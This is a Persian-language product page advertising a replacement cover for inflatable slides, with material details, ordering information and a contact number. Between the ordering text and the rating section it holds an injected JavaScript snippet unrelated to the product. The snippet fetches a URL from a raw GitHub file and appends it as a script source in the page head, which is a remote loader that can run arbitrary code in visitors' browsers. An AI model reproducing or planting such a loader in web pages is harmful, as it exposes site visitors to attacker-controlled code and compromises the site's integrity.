روکش سر

  • یکی از اصلی ترین لوازم جانی سرسره ها روکش سر است .کاور سر برای هر یک از دستگاه ها متفاوت است و ابعاد اندازه ان بستگی به سرسره شما دارد. داشتن کاورسر الزامی است چنانچه روکش سر شما پاره و یا تاریخ انقضای آن بگذرد باید روکش را تعویض کنید. به هیچ وجه دستگاه را بدونه کاور سراستفاده نکنید. جنس کاورسر با جنس بدنه یکی نمی باشد. جنس کاورسر لغزنده و سر است و برای سر شدن و شتاب بیشترآن از مواد سر کننده ( واکس سر کننده ) . حمل نقل این کار دردسر ندارد کاور می توانید از دستگاه جدا کرده و آن را تا کنید و یک بند دورش ببندید، داخل ماشین بگذارید و آن را جا به جا کنید. جنس این کاور ها از پارچه با کیفیت کره ای و دوخت آن توسط اساتید مجرب بادی سازان مجد انجام می شود. نخ دوخت این کاورسر از جنس نخ با کیفیت ترکیه ای می باش. پشت این کاور چسپ نرمی دوخته شدع و روی سرسره شما چسب زبری دوخته شده. که این چسب ها روی می چسپند و به این راحتی از هم جدا نمی شوند. برای مشاهد دیگر لوازم جانبی به این پست مراجعه فرمایید.

    نحوه خرید روکش سر

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید کاورسر به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید